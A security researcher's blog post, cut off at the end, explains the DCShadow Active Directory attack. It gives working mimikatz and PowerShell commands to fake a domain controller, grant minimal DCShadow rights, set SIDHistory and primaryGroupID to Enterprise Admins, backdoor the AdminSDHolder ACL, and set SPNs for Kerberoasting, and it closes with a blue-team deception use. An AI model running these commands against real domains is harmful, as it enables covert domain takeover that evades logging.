Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-82766124050291396332018-04-06T19:22:00.000+05:302018-05-03T22:15:27.898+05:30DCShadow - Minimal permissions, Active Directory Deception, Shadowception and more<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<a href="https://www.dcshadow.com/">DCShadow</a> is an awesome persistence technique introduced by <a href="https://twitter.com/mysmartlogon">Vincent</a> and <a href="https://twitter.com/gentilkiwi">Benjamin</a> at <a href="http://www.bluehatil.com/files/Active%20Directory%20What%20Can%20Make%20Your%20Million%20Dollar%20SIEM%20Go%20Blind.pdf">BluteHat IL</a> and it can be executed with the help of mimikatz. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In very simplified terms, DCShadow alters active directory schema (Configuration partition and SPN of the attacker machine) to mimic a domain controller. This "new" domain controller can then be used to push attributes (like SID History, Password History, SPNs etc.) and other data on domain objects for users, computers etc. Please visit <a href="http://dcshadow.com/">dcshadow.com</a> and above linked preso for more details. There are couple more interesting posts at <a href="https://blog.alsid.eu/dcshadow-explained-4510f52fc19d">ALSID blog</a> and <a href="https://www.nopsec.com/blog/dcshadow-how-become-domain-controller/">NOPSEC blog</a> which are very useful in understanding DCShadow.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In this blog post, I make notes of some of the use cases of DCShadow and couple of experiments I did while using it. Please keep in mind that I am still playing with this technique :)</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Executing DCShadow</h3>
<div style="text-align: justify;">
Grab the latest build of mimikatz from its <a href="https://github.com/gentilkiwi/mimikatz">GitHub repo</a> or Invoke-Mimikatz from <a href="https://github.com/samratashok/nishang/">Nishang</a>. The attack must be executed from a domain joined machine and needs SYSTEM privileges on the machine and by-default, domain administrator (DA) privileges on the domain.</div>
<br />
<div style="text-align: justify;">
Please keep in mind that the SYSTEM requirement is for process context and not thread. I learnt this the hard way but thankfully, a very patient Vincent and <a href="https://github.com/gentilkiwi/mimikatz/blob/2e4edccee83d63925b9a8861610b1a51276d7432/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c#L2186-L2193">the source code</a> helped me out :)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So, here is how to use it:</div>
<div style="text-align: justify;">
1. Start mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM. Make sure to use !processtoken before opening another instance of mimikatz, This is the mimikatz instance where we will specify the target object and attributes to be modified.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEico9Rp3fcRbUhqDzoE8wcbzzrE67qZNsZ4zE_OqCZEii8_7L7YzKGE92P5iRA15MGNk9LRrsJ65FJrC65PGO5t3U647YLjZOBmttgDXpu2-8ubxTftB6yiEi8Q3YtOiBnGHh0zuwqV9fY/s1600/mimikatz_SYSTEM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="599" data-original-width="1459" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEico9Rp3fcRbUhqDzoE8wcbzzrE67qZNsZ4zE_OqCZEii8_7L7YzKGE92P5iRA15MGNk9LRrsJ65FJrC65PGO5t3U647YLjZOBmttgDXpu2-8ubxTftB6yiEi8Q3YtOiBnGHh0zuwqV9fY/s400/mimikatz_SYSTEM.png" width="400" /></a></div>
<div style="text-align: justify;">
2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNv5Brdh7oyA7jVZ9JEgzhdk8enVqJpYqJzkCp0F97sFyBB9S3mkD3CHfQYmJE6-BOLS4oMQYPN_QY1H9q5cXA9hfk2yiBEb8OvfHgdEbzcBfvi8Wy6fm2mtWnyPZYIpa5Iu_Y_bRirS8/s1600/mimikatz_DA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="396" data-original-width="1435" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNv5Brdh7oyA7jVZ9JEgzhdk8enVqJpYqJzkCp0F97sFyBB9S3mkD3CHfQYmJE6-BOLS4oMQYPN_QY1H9q5cXA9hfk2yiBEb8OvfHgdEbzcBfvi8Wy6fm2mtWnyPZYIpa5Iu_Y_bRirS8/s400/mimikatz_DA.png" width="400" /></a></div>
<div style="text-align: justify;">
We are now ready to use dcshadow. For example, use the below command from mimikatz running as SYSTEM to change userAccountControl value of a computer object. Mimikatz makes checks for validity of object and attributes which is awesome!<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTJSRzyJQQIxc9X2-kPx6KQuvLi6MSnuPr0WmCKCl-ydCm1Fx3I3cNGJRIjrpuG4UyELHObotwuIYn2Wrrfxpd7Ln_5CVza2mL0cKIzBI_o96-_cXsS4Odr9H8l9IMZ_6ooNLK83bstXs/s1600/mimikatz_attributes.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="954" data-original-width="1463" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTJSRzyJQQIxc9X2-kPx6KQuvLi6MSnuPr0WmCKCl-ydCm1Fx3I3cNGJRIjrpuG4UyELHObotwuIYn2Wrrfxpd7Ln_5CVza2mL0cKIzBI_o96-_cXsS4Odr9H8l9IMZ_6ooNLK83bstXs/s400/mimikatz_attributes.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
To push the above attributes, run the below command from mimikatz running as DA.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /push
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5JrreHFna8WKt0R1-ZR5AEaZOqIrekl5i0LH68YAr90aN0-2xzLp1YaTqVgC4uysmBAzqX9k29BF26Mk2O5mL6eabxbp1WNur09sQeYMRAZLd_zeQBeE-mkVK-YnDmlEO7dIld853JQ4/s1600/mimikatz_push.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="789" data-original-width="1463" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5JrreHFna8WKt0R1-ZR5AEaZOqIrekl5i0LH68YAr90aN0-2xzLp1YaTqVgC4uysmBAzqX9k29BF26Mk2O5mL6eabxbp1WNur09sQeYMRAZLd_zeQBeE-mkVK-YnDmlEO7dIld853JQ4/s400/mimikatz_push.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
On the other mimikatz session, we can see the values are updated and RPC server is stopped. </div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCyYMLK0JdgSWCApmW_0yAW7-dVxyzM1FsFjdWqjRSJF6fxfHB38ZY_i0HZ0GfRd4CKXqKO9kwjNDO_ERNu3xV4CMrKuQkDvkeNLpHmj29RcNDaOgSvGO7SfATOJOzVgTW_7SevjxJ2bU/s1600/mimikatz_attributes_pushed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1030" data-original-width="1463" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCyYMLK0JdgSWCApmW_0yAW7-dVxyzM1FsFjdWqjRSJF6fxfHB38ZY_i0HZ0GfRd4CKXqKO9kwjNDO_ERNu3xV4CMrKuQkDvkeNLpHmj29RcNDaOgSvGO7SfATOJOzVgTW_7SevjxJ2bU/s400/mimikatz_attributes_pushed.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
Let's check the userAccountControl attribute of the computer object we modified.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> ([adsisearcher]"(&(objectCategory=Computer)(name=ops-user19))").Findall().Properties.useraccountcontrol
</textarea></pre>
</div>
<div style="text-align: justify;">
Works like a charm with Invoke-Mimikatz as well.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjte2i7eyebbAa1q-cLMoAdsrtBd4gC8nKbVFJm2e0SbXVKrlUIOxttxiNWlzTtq2zeLWpIqBRHeXskZrqXE-BTYV04nUBPvMHcBQAoEatYrRQ9rDGGLuf7lxUpQT7rKXHcxT45QyMc4Fc/s1600/mimikatz_attributes_result.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="206" data-original-width="1600" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjte2i7eyebbAa1q-cLMoAdsrtBd4gC8nKbVFJm2e0SbXVKrlUIOxttxiNWlzTtq2zeLWpIqBRHeXskZrqXE-BTYV04nUBPvMHcBQAoEatYrRQ9rDGGLuf7lxUpQT7rKXHcxT45QyMc4Fc/s400/mimikatz_attributes_result.png" width="400" /></a></div>
Please keep in mind that even on a local machine with interactive access, Invoke-Mimikatz does not show the message of "RPC server started" until the push command is executed, probably because of output redirection issues. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRABn3d7DOeThcZag6aOBR4_zWjdaJEsU4pTvfLw5oJrm8O0GbDG7CMJm38_jQaY2dQ2b0MDCyJttzpyzGzZOmiRxeC6DHvYw7X_X-Ljt_4ngkmiCsFEQfEPl_e2eWrezBrOtk7pg7bFE/s1600/Invoke-Mimikatz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="828" data-original-width="1600" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRABn3d7DOeThcZag6aOBR4_zWjdaJEsU4pTvfLw5oJrm8O0GbDG7CMJm38_jQaY2dQ2b0MDCyJttzpyzGzZOmiRxeC6DHvYw7X_X-Ljt_4ngkmiCsFEQfEPl_e2eWrezBrOtk7pg7bFE/s400/Invoke-Mimikatz.png" width="400" /></a></div>
<br />
<h3>
DCShadow for Red Teams</h3>
<br />
<b>Minimal permissions</b><br />
DCShadow provides amazing persistence opportunities. Many <a href="https://adsecurity.org/?p=1929">well known ones</a> as well as some new stuff, can be executed with it without leaving logs on the DC. While learning about it, I started wondering if there is a way to use DCShadow without DA privileges? Like most domain persistence methods, we do not need DA privileges all the time for DCShadow but only for setting it up. For using it later on, only a subset of permissions are required. <br />
<br />
After spending much time reading MS documentations on MS-DRSR and MS-RPCE to understand the errors shown by mimikatz when not using DA and experimenting with permissions, I was able to segregate the permissions required for running DCShadow <b>without</b> having DA privileges!<br />
<br />
What does that mean? That means, you need DA privileges just once to set up the required minimal permissions for user of your choice. That user can successfully run DCShadow against a specific object later on. What are the rights required?<br />
<br />
Following (<a href="https://technet.microsoft.com/en-us/library/ff405676.aspx">extended rights</a>) for the domain object:<br />
- DS-Install-Replica (Add/Remove Replica in Domain)<br />
- DS-Replication-Manage-Topology (Manage Replication Topology)<br />
- DS-Replication-Synchronize (Replication Synchornization)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuj4UKBm52dc54GHEaL93oyTdcSaWCmtariim3HQPBhI7-1W_MsYrb8HQ5o6iZWc9nzrz2hWfixjWmLAchZ0SmAk1ckX6yj82gW54-wkmyAXc4x6qWizI5En-MI4lcZ5gyE5uYg9NFVk0/s1600/Extended_Rights_modified.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="527" data-original-width="781" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuj4UKBm52dc54GHEaL93oyTdcSaWCmtariim3HQPBhI7-1W_MsYrb8HQ5o6iZWc9nzrz2hWfixjWmLAchZ0SmAk1ckX6yj82gW54-wkmyAXc4x6qWizI5En-MI4lcZ5gyE5uYg9NFVk0/s400/Extended_Rights_modified.png" width="400" /></a></div>
We also need WriteProperty right on the computer object of machine which is used for attack (gets registered as a DC) to modify SPNs and the target object to modify attributes.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoJWuNwtuA9Tr8kavmb5dbRo8WBv22TqwnYXvZ0p4fqEWxbP-2GTaT-nMGW71ovqCoozt98gsVXBQKMISZmCFWSIt6C62xy3mmeBgXOqdUWbM8wjiu1bH3ifESHQO9JGqqJV33SOWz7AI/s1600/Target-Permissions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="535" data-original-width="477" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoJWuNwtuA9Tr8kavmb5dbRo8WBv22TqwnYXvZ0p4fqEWxbP-2GTaT-nMGW71ovqCoozt98gsVXBQKMISZmCFWSIt6C62xy3mmeBgXOqdUWbM8wjiu1bH3ifESHQO9JGqqJV33SOWz7AI/s400/Target-Permissions.png" width="356" /></a></div>
Lastly, CreateChild and DeleteChild permissions are required on the Sites object (and child objects) in the Configuration container to register and un-register a DC. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfwxzN3wr2GlKOKE22aXjDaZMEFBvYGCzF9kGvVdNl14shTK6YGDjSlggBClweJSXLj0AUC9EarShtudYh8GygoDUBfj0sg0eV9V7o7mSW8AEa1yB0AxVzB2Ie2qeNVH6fsQwsxjp_58/s1600/Sites-Permission.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="462" data-original-width="414" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfwxzN3wr2GlKOKE22aXjDaZMEFBvYGCzF9kGvVdNl14shTK6YGDjSlggBClweJSXLj0AUC9EarShtudYh8GygoDUBfj0sg0eV9V7o7mSW8AEa1yB0AxVzB2Ie2qeNVH6fsQwsxjp_58/s400/Sites-Permission.png" width="357" /></a></div>
To automate modification of the objects, I give you <a href="https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1">Set-DCShadowPermissions.ps1</a> in Nishang, a PowerShell script which sets minimal permissions for executing DCShadow attack! Use the below command with DA privileges to set permissions for user "labuser" to modify permissions on computer object ops-user19 from the computer ops-user12. </div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> . C:\nishang\ActiveDirectory\Set-DCShadowPermissions.ps1
PS C:\> Set-DCShadowPermissions -FakeDC ops-user12 -Object "ops-user19" -Username labuser -Verbose
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSuKsJRD4WCwaN87BGW3MLBoHjTHlZlPGnnO-IOdKwSC2y18neE5VowvVGxu__OrQYRm4vXxXIM3-9fEg7ohI83dWBHq3_96VJPCH9ccAJ9zBMRsF3kwe65iowUyMCDtsqDRvVhDt80XU/s1600/Set-DCShadowPermissions-Computer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="259" data-original-width="1600" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSuKsJRD4WCwaN87BGW3MLBoHjTHlZlPGnnO-IOdKwSC2y18neE5VowvVGxu__OrQYRm4vXxXIM3-9fEg7ohI83dWBHq3_96VJPCH9ccAJ9zBMRsF3kwe65iowUyMCDtsqDRvVhDt80XU/s400/Set-DCShadowPermissions-Computer.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
Now, the mimikatz command can be executed without DA privileges. Please note that the command output is same as when using DA (see the screenshots in the beginning of the post).<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikFsRXD4_1ZkcF2TB1tMNARYzy2erFjk6hOHhyphenhyphenukiXXyqfBH8OrW6iu87UNCL-pmBrKqsYZOcSNzGBiFVHSR8y-30KTWiVa4AY_l0CcAdBa1lYuGUAx3vC5R1SWCNhGUJAxPc6TQAU_pU/s1600/dcshdaow_start.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="757" data-original-width="1600" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikFsRXD4_1ZkcF2TB1tMNARYzy2erFjk6hOHhyphenhyphenukiXXyqfBH8OrW6iu87UNCL-pmBrKqsYZOcSNzGBiFVHSR8y-30KTWiVa4AY_l0CcAdBa1lYuGUAx3vC5R1SWCNhGUJAxPc6TQAU_pU/s400/dcshdaow_start.png" width="400" /></a></div>
Neat isn't it! Append the -Remove parameter at the end of the above command for cleanup.<br />
<br />
Note that logs (4662 for changes made to ACL of the domain object, 4742 for changes made to ACL of attacker's computer object and 4738 if the target is a user object) are generated when you modify ACLs using Set-DCShadowPermissions but so is true for other methods required to persist with high privileges. <br />
<br />
Once we have the permissions (or DA), we can use DCShadow for tons of interesting things. Let's have a look at some of them. Please note that I am going to use all of them without DA by modifying permissions using Set-DCShadowPermissions:<br />
<br />
<h4>
</h4>
<b>SIDHistory</b><br />
Very useful, also mentioned in the DCShadow presentation. Set the SIDHistory of an account to a high privilege one like DA or EA group and we are all set for highest privileges without having to modify any Group Membership or ACL.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Set-DCShadowPermissions -FakeDC ops-user12 -Object helpdeskuser -Username labuser -Verbose
</textarea></pre>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:helpdeskuser /attribute:SIDHistory /value:S-1-5-21-3270384115-3177237293-604223748-519
</textarea></pre>
<br />
<b>PrimaryGroupID</b><br />
This too is from the preso. Change the primaryGroupID of an object to a high privileged one for higher privileges.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:helpdeskuser /attribute:primaryGroupID /value:519
</textarea></pre>
There is a catch though, if this is used to change primaryGroupID of a user to a privileged group, that user may show up in listing of that group which is not really stealthy. Note that this listing in the group depends on the tool used for enumeration. For example, in the below screenshot, the user "helpdeskuser" shows up as a member of "Enterprise Admins" group when using net.exe (or Get-ADGroupMember from the activedirectory module) but not when using PowerView ;)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrr5wwNjrxM9ll7Xc85Ld43TYzrhDMte7ueSUFaxgGqw-LuNMPuGmpQF68vaZyCeTmm7mi1IYZqzIEWXMzDE7tvNmus0jtoD1gQNdzqCMoli19I0-2FD23EExEQI_Ecijbqz1DlBaDZj0/s1600/PrimaryGroupID.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="853" data-original-width="1600" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrr5wwNjrxM9ll7Xc85Ld43TYzrhDMte7ueSUFaxgGqw-LuNMPuGmpQF68vaZyCeTmm7mi1IYZqzIEWXMzDE7tvNmus0jtoD1gQNdzqCMoli19I0-2FD23EExEQI_Ecijbqz1DlBaDZj0/s400/PrimaryGroupID.png" width="400" /></a></div>
<b>AdminSDHolder</b><br />
Like the simpler attributes we modified above, it is possible to modify ACLs on objects using DCShadow by modifying the ntSecurityDescriptor attribute. This ability allows even more interesting stuff. For example, modifying <a href="https://technet.microsoft.com/en-us/library/2009.09.sdadminholder.aspx">AdminSDHolder</a> ACL for <a href="https://adsecurity.org/?p=1906">persistence</a>.<br />
<br />
To use this, we need to read the existing SDDL on the AdminSDHolder container and add permissions for our user's SID. Quite similar to what I used in <a href="https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1">Set-RemoteWMI</a><br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> (New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=offensiveps,DC=com")).psbase.ObjectSecurity.sddl
</textarea></pre>
To add Full Control permission we can use permissions of the BA, DA or EA (highlighted in the above screenshot) and append our user's SID. The resulting below string needs to be added to the SDDL of AdminSDHolder.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: white; color: black;">(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;S-1-5-21-3270384115-3177237293-604223748-2111)
</textarea></pre>
Use the below mimkatz command for DCShadow. Make sure you use the colon ":" for specifying values to parameters:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=offensiveps,DC=com /attribute:ntSecurityDescriptor /value:"O:DAG:DAD:PAI(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;LCRPLORC;;;RU)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;DA)(A;;CCDCLCSWRPWPLOCRRCWDWO;;;S-1-5-21-3270384115-3177237293-604223748-519)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)(OA;CI;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;PS)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;RPWP;5805bc62-bdc9-4428-a5e2-856a0f4c185e;;S-1-5-32-561)(OA;;RPWP;6db69a1c-9422-11d1-aebd-0000f80367c1;;S-1-5-32-561)(OA;;RPWP;bf967a7f-0de6-11d0-a285-00aa003049e2;;CA)(A;;CCDCLCSWRPWPLOCRSDRCWDWO;;;S-1-5-21-3270384115-3177237293-604223748-2111)"
</textarea></pre>
<br />
<b>DCShadow using DCShadow - Shadowception</b><br />
<br />
Similar to above, we can also push DCShadow permissions using DCShadow.I call it Shadowception Why? Because it is fun :P We just need to push permissions listed above while introducing Set-DCShadowPermissions. The permissions required are:</div>
<pre><textarea cols="70" readonly="readonly" rows="10" style="background-color: white; color: black;">On Domain object: (OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;YourUserSID)(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;YourUserSID)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;YourUserSID)
On attacker computer object: (A;;WP;;;YourUserSID)
On attacker user object: (A;;WP;;;YourUserSID)
On the Sites object in Configuration container: (A;CI;CCDC;;;YourUserSID)
</textarea></pre>
<div style="text-align: justify;">
Use the below mimikatz commands to set DCShadow permissions which can be used only from a particular computer as a specific user against a specific object - all of them specified in the commands. Please do not get intimidated with long commands, I have used exactly the same method as for AdminSDHolder - Copy the existing SDDL and append your own.</div>
<pre><textarea cols="70" readonly="readonly" rows="5" style="background-color: black; color: white;">lsadump::dcshadow /stack /object:DC=offensiveps,DC=com /attribute:ntSecurityDescriptor /value:"Existing SDDL + Permissions for YourUserSID"
lsadump::dcshadow /stack /object:ops-user12$ /attribute:ntSecurityDescriptor /value:"Existing SDDL + Permissions for YourUserSID"
lsadump::dcshadow /stack /object:helpdeskuser /attribute:ntSecurityDescriptor /value:"Existing SDDL + Permissions for YourUserSID"
lsadump::dcshadow /stack /object:CN=Sites,CN=Configuration,DC=offensiveps,DC=com /attribute:ntSecurityDescriptor /value:"Existing SDDL + Permissions for YourUserSID"
lsadump::dcshadow
</textarea></pre>
<div style="text-align: justify;">
This is sweet! Now, if we maintain access to the computer and the user specified above, it is possible to modify the attributes of the specified object without leaving logs.<br />
<br /></div>
<div style="text-align: justify;">
</div>
</div>
<div style="text-align: justify;">
<b>Setting SPNs on Admin Accounts for Kerberoasting</b></div>
<div style="text-align: justify;">
As explained by Sean <a href="https://adsecurity.org/?p=3466">here</a>, in this technique we force set SPNs for admin accounts for later Kerberoasting. Kerberoasting, those of you who are unaware, is an attack technique where TGS (Ticket Granting Service) is requested for a SPN, saved to the disk and then brute-forced offline for password of the target SPNs service account. Thus if we can set SPN for a privileged account, it is possible to brute-force its password in clear-text using kerberoasting. To set SPNs for privileged account, we need high privileges, hence this is a persistence technique. Below command can be used to set SPN of a DA account using DCShadow:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:tempda /attribute:servicePrincipalName /value:"DCReplication/DC"
</textarea></pre>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
In addition to the above discussed, you can find your own attack. For example, I have not discussed setting TrustedForDelegation and TrustedToAuthForDelegation :) Go through the list of All AD attributes and find more interesting ones - <a href="https://msdn.microsoft.com/en-us/library/ms675090(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/ms675090(v=vs.85).aspx</a></div>
<div style="text-align: justify;">
<br />
<b>Defense</b><br />
For defense, see <a href="http://dcshadow.com/">dcshadow.com</a> and <a href="https://github.com/AlsidOfficial/UncoverDCShadow">UnCoverDCShadow</a>. And limit the number of DAs and usage of DA credentials across your enterprise ;) A very good reference is <a href="https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material">Securing Privileged Access Reference Material</a>.</div>
<div style="text-align: justify;">
<h3>
</h3>
<h3>
DCShadow for Blue Team Deception</h3>
</div>
<div style="text-align: justify;">
For past couple of months, I have been working a lot on using Deception for defense. I am liking Active Directory Deception because of its efficacy in providing alerts and increasing (at least) time costs to an adversary. While I will leave the details for another post and/or talk, one thing difficult for me when forging objects which are interesting for an attacker is editing some of the attributes of an object. For example, it is not easy to forge a computer object to make it look like a DC object. Multiple attributes and services must be set before a computer object "appears" to be a DC. There are some workarounds but that calls for another post or as I said a talk. So, DCShadow helps with forging a domain controller which looks more real. Of course, there is a lot of scope for improvement but I really like how it open up opportunities for blue teams.<br />
<br />
A quick example is this. Suppose we want to make a member computer object "ops-user12" a DC. We can use the following (make sure you either have DA privs or set permission using Set-DCShadow permissions):<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:ops-user12$ /attribute:primaryGroupID /value:516</textarea></pre>
Push the above<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /object:ops-user12$ /attribute:userAccountControl /value:532480</textarea></pre>
Push the above<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">mimikatz # lsadump::dcshadow /manualregister</textarea></pre>
Use the above from mimikatz instance running as DA or modified permissions. Now, if an adversary enumerates your domain, this is what it looks like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFpcADt8PAu3AX0066zBCLPg73nLguPtttVvQmZJFgRLtEmSB1AmUl2ysP6Iv_eO3XLO9g6pARX2iaoCo1CGkZ6AdMxinUe5EL4PAuMCrPMwvR-woOWAeQHXEnHWTjrTU5WdistP0Hq0w/s1600/Deception_net.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="729" data-original-width="1343" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFpcADt8PAu3AX0066zBCLPg73nLguPtttVvQmZJFgRLtEmSB1AmUl2ysP6Iv_eO3XLO9g6pARX2iaoCo1CGkZ6AdMxinUe5EL4PAuMCrPMwvR-woOWAeQHXEnHWTjrTU5WdistP0Hq0w/s400/Deception_net.png" width="400" /></a></div>
And this holds true for most of the red team tools (like PowerView which uses the .NET class in above screenshot) and even most of the WMI classes for domain enumeration like Win32_NTDomain and ds_computer of the directory\ldap namespace.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitK1UrfTy3M5vT9HDyxuNfd_5CVnYeS6wWaxwv0ePZL53fLjhjYVvXh0einVxBfRc0hgqE10o8J5-WEDK7PG8aQymOxto0094TMCavstoZKFUKQwG2MXiT1POtL2evy0JQ4T8TMVpIpSw/s1600/Deception_WMI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="864" data-original-width="1355" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitK1UrfTy3M5vT9HDyxuNfd_5CVnYeS6wWaxwv0ePZL53fLjhjYVvXh0einVxBfRc0hgqE10o8J5-WEDK7PG8aQymOxto0094TMCavstoZKFUKQwG2MXiT1POtL2evy0JQ4T8TMVpIpSw/s400/Deception_WMI.png" width="400" /></a></div>
But this is still very experimental. We can easily note missing attributes from the fake DC, although that can be set. The thing which concerns me right now is if this breaks any authentication requests or other legit functioality. Because when using the "push" option of DCShadow, the registration and unregistration takes place quickly but when we are doing it manually what if some legit authentication requests are directed to the fake DC? I am hoping to find an answer of that soon. <br />
<br />
I wish this use of DCShadow for deception triggers a community effort on using AD objects for deception :)<br />
<br />
<b>Problems </b><br />
Some of the problems you may face while using DCShadow:<br />
<br />
